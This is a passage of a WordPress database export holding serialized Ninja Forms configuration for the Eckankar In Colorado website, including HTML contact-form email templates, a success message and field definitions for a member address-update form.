valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_142},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland ECK Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:6;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:32\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:7;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:32\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:34:\"Loveland Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3520:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Loveland Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland ECK Leadership organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_142} {field:lastname_143}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:8;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:30:\" Loveland Initiators and ESA\'s\";s:10:\"created_at\";s:19:\"2019-07-15 14:03:44\";s:10:\"form_title\";s:35:\" Loveland Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:38:36\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:1:{s:5:\"tmp-1\";s:5:\"tmp-1\";}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(4,'a:7:{s:2:\"id\";i:4;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:13:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:519:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:590:\"<p><font color=\"#23507d\"><span style=\"font-size: 28px;\"><b>Members</b></span></font></p>\n<p><span style=\"color: rgb(51, 51, 51);font-size: 22px;\">Add/Update Email or Mailing Address</span></p>\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size:20px;\"><br>Your Information Is Safe</span></strong></p>\n<p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>\";s:3:\"key\";s:8:\"html_201\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_201\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:29;}i:1;a:2:{s:8:\"settings\";a:53:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_202\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_202\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:15:\"one-half first \";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:30;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_203\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_203\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:31;}i:3;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:9:\"phone_205\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_205\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:32;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:55:\"Email    (please fill in if adding or updating email)\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:9:\"email_204\";s:11:\"field_label\";s:55:\"Email    (please fill in if adding or updating email)\";s:9:\"field_key\";s:9:\"email_204\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:33;}i:5;a:2:{s:8:\"settings\";a:54:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"address\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"8\";s:5:\"label\";s:46:\"Street Address (add or update mailing address)\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:3:\"key\";s:58:\"street_address_add_or_update_mailing_address_1616603898544\";s:11:\"field_label\";s:78:\"Street Address Â  Â (please fill in if adding or updating mailing address)\";s:9:\"field_key\";s:11:\"address_213\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:7:\"address\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:34;}i:6;a:2:{s:8:\"settings\";a:54:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"city\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"10\";s:5:\"label\";s:4:\"City\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"nu